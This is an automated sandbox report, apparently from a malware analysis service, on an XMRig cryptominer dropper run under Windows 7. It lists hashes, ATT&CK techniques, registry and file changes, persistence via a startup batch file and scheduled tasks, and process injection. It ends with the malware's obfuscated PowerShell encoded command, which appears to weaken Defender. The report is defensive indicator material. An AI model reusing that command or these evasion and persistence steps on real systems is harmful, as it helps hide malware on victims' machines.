xmrig | 17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6

Analysis

max time kernel
300s
max time network
266s
platform
windows7_x64
resource
win7-20220715-en
resource tags

arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
submitted
15-07-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe
Size

7.6MB
MD5

2169dc30793b25843551c51894827089
SHA1

6ce2a8226221e154905127e88c0b022d4a89fac5
SHA256

17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6
SHA512

4731809e0f8aa22e3b90a5b81942b20997338ba91489ccc97e054300bdfc9604fb6e66a0ff83738cbee16138a55f4727f9fcddaba3cbcb78bb59bd14cd9e89bc

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

setup.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 14 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1640-150-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-152-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-154-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-155-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-156-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-158-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-160-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-161-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-162-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-164-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-165-0x000000014036EAC4-mapping.dmp	xmrig
behavioral1/memory/1640-167-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-168-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1640-170-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1652 setup.exe
1516 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1880 takeown.exe
520 icacls.exe
1420 takeown.exe
1688 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1652	setup.exe
1516	updater.exe

pid	process
1880	takeown.exe
520	icacls.exe
1420	takeown.exe
1688	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Loads dropped DLL 2 IoCs

Processes:

17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exetaskeng.exe

pid process

912 17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe
1972 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

520 icacls.exe
1420 takeown.exe
1688 icacls.exe
1880 takeown.exe

pid	process
912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe
1972	taskeng.exe

pid	process
520	icacls.exe
1420	takeown.exe
1688	icacls.exe
1880	takeown.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Windows\Temp\setup.exe	themida
C:\Windows\Temp\setup.exe	themida
behavioral1/memory/1652-64-0x0000000000400000-0x00000000010C4000-memory.dmp	themida
behavioral1/memory/1652-68-0x0000000000400000-0x00000000010C4000-memory.dmp	themida
C:\Windows\Temp\setup.exe	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1516-95-0x0000000000400000-0x00000000010C4000-memory.dmp	themida
behavioral1/memory/1516-97-0x0000000000400000-0x00000000010C4000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1652 setup.exe
1516 updater.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 572 set thread context of 1640 572 conhost.exe explorer.exe

pid	process
1652	setup.exe
1516	updater.exe

description	pid	process	target process
PID 572 set thread context of 1640	572	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe
File created	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1608 sc.exe
1012 sc.exe
1832 sc.exe
1256 sc.exe
1988 sc.exe
2028 sc.exe
1968 sc.exe
1080 sc.exe
868 sc.exe
688 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1956 schtasks.exe

pid	process
1608	sc.exe
1012	sc.exe
1832	sc.exe
1256	sc.exe
1988	sc.exe
2028	sc.exe
1968	sc.exe
1080	sc.exe
868	sc.exe
688	sc.exe

pid	process
1956	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 46 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "16"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e528c10875d4b347a30c038b2e32007f00000000020000000000106600000001000020000000a1c9830a4cacf85ec15e2837be5c6cb57c0ae819ce18c1faa6fb5eb057aec5fb000000000e80000000020000200000006d9f674a5b78065e7d139d365a31d34eb48f8ab169cdad5260ddb71869cadd54200000003edaa8ea238dcbc0ac6bd95f17c432efee71b4a4a39095a0517ed6a3c77183e84000000011b4329397951038a164dbb2d9e9f8830fdaad027cb314e9c8da825f35113220347caa5344126ed84fefde937f947a7ac387749e200ff830e06e0ed51daef59b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "364688292"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9A750171-048B-11ED-B6E0-66578E127779} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00d4267c9898d801	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "16"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "16"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e528c10875d4b347a30c038b2e32007f00000000020000000000106600000001000020000000ae6a6183f632adb8d87a80d5121aed9ff902ada9e6bcb0745da264f7e7fbc4cd000000000e800000000200002000000013f0cf653df483b7280f41574113a500a743534edb3f3bdcbbc07692b81c39fd9000000014a54ccadebf9700789a808e22ed065140cffddc5a9f3606f16ff0b5632282dd2c6393dfd82312afd8e971f811b61e6bba9a0caabc7151d1369fba19bb2c36b7aa2c116088aaadb5ee96f1659eeffa2d191e17116bb059ea5382e620aa746b52c4debb0ef7befde75a70a328c9b0c033e010663d661232981ce67ebdcb35b467dddd7e933b3101979aae730fc91b886240000000dd5cd804ba85c7962cbb8541b3f0d98d685524139a3dea9ce260702f7ab5a7fe7005a30e0c6c87191e4033a3031297293ecbcf827746baa8a626f115a4b5c171	iexplore.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

conhost.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50bfe6629898d801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
908	reg.exe
1688	reg.exe
1900	reg.exe
1636	reg.exe
980	reg.exe
1664	reg.exe
1732	reg.exe
1064	reg.exe
1352	reg.exe
556	reg.exe
852	reg.exe
1944	reg.exe
1952	reg.exe
1952	reg.exe
1636	reg.exe
1228	reg.exe
568	reg.exe
1988	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
1016	powershell.exe
1232	conhost.exe
1876	powershell.exe
572	conhost.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe
1640	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeShutdownPrivilege	1640	powercfg.exe
Token: SeShutdownPrivilege	1216	powercfg.exe
Token: SeDebugPrivilege	1232	conhost.exe
Token: SeShutdownPrivilege	1680	powercfg.exe
Token: SeShutdownPrivilege	1260	powercfg.exe
Token: SeTakeOwnershipPrivilege	1880	takeown.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	572	conhost.exe
Token: SeShutdownPrivilege	992	powercfg.exe
Token: SeShutdownPrivilege	520	powercfg.exe
Token: SeShutdownPrivilege	636	powercfg.exe
Token: SeShutdownPrivilege	1348	powercfg.exe
Token: SeTakeOwnershipPrivilege	1420	takeown.exe
Token: SeLockMemoryPrivilege	1640	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1644 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1644 iexplore.exe
1644 iexplore.exe
1212 IEXPLORE.EXE
1212 IEXPLORE.EXE
1212 IEXPLORE.EXE
1212 IEXPLORE.EXE

pid	process
1644	iexplore.exe

pid	process
1644	iexplore.exe
1644	iexplore.exe
1212	IEXPLORE.EXE
1212	IEXPLORE.EXE
1212	IEXPLORE.EXE
1212	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exesetup.execmd.exeiexplore.execonhost.execmd.execmd.execmd.exetaskeng.exeupdater.exe

description	pid	process	target process
PID 912 wrote to memory of 1652	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	setup.exe
PID 912 wrote to memory of 1652	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	setup.exe
PID 912 wrote to memory of 1652	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	setup.exe
PID 912 wrote to memory of 1652	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	setup.exe
PID 912 wrote to memory of 556	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 556	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 556	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 556	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 1772	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 1772	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 1772	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 912 wrote to memory of 1772	912	17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe	cmd.exe
PID 1652 wrote to memory of 1232	1652	setup.exe	conhost.exe
PID 1652 wrote to memory of 1232	1652	setup.exe	conhost.exe
PID 1652 wrote to memory of 1232	1652	setup.exe	conhost.exe
PID 1652 wrote to memory of 1232	1652	setup.exe	conhost.exe
PID 1772 wrote to memory of 1644	1772	cmd.exe	iexplore.exe
PID 1772 wrote to memory of 1644	1772	cmd.exe	iexplore.exe
PID 1772 wrote to memory of 1644	1772	cmd.exe	iexplore.exe
PID 1772 wrote to memory of 1644	1772	cmd.exe	iexplore.exe
PID 1644 wrote to memory of 1212	1644	iexplore.exe	IEXPLORE.EXE
PID 1644 wrote to memory of 1212	1644	iexplore.exe	IEXPLORE.EXE
PID 1644 wrote to memory of 1212	1644	iexplore.exe	IEXPLORE.EXE
PID 1644 wrote to memory of 1212	1644	iexplore.exe	IEXPLORE.EXE
PID 1232 wrote to memory of 1016	1232	conhost.exe	powershell.exe
PID 1232 wrote to memory of 1016	1232	conhost.exe	powershell.exe
PID 1232 wrote to memory of 1016	1232	conhost.exe	powershell.exe
PID 1232 wrote to memory of 1584	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 1584	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 1584	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 2016	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 2016	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 2016	1232	conhost.exe	cmd.exe
PID 2016 wrote to memory of 1640	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1640	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1640	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1216	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1216	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1216	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1680	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1680	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1680	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1260	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1260	2016	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1260	2016	cmd.exe	powercfg.exe
PID 1232 wrote to memory of 856	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 856	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 856	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 1728	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 1728	1232	conhost.exe	cmd.exe
PID 1232 wrote to memory of 1728	1232	conhost.exe	cmd.exe
PID 856 wrote to memory of 1956	856	cmd.exe	schtasks.exe
PID 856 wrote to memory of 1956	856	cmd.exe	schtasks.exe
PID 856 wrote to memory of 1956	856	cmd.exe	schtasks.exe
PID 1728 wrote to memory of 1256	1728	cmd.exe	schtasks.exe
PID 1728 wrote to memory of 1256	1728	cmd.exe	schtasks.exe
PID 1728 wrote to memory of 1256	1728	cmd.exe	schtasks.exe
PID 1972 wrote to memory of 1516	1972	taskeng.exe	updater.exe
PID 1972 wrote to memory of 1516	1972	taskeng.exe	updater.exe
PID 1972 wrote to memory of 1516	1972	taskeng.exe	updater.exe
PID 1516 wrote to memory of 572	1516	updater.exe	conhost.exe
PID 1516 wrote to memory of 572	1516	updater.exe	conhost.exe
PID 1516 wrote to memory of 572	1516	updater.exe	conhost.exe
PID 1516 wrote to memory of 572	1516	updater.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe
"C:\Users\Admin\AppData\Local\Temp\17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
3⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBuAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgAjAD4A"
4⤵
- Drops file in System32 directory
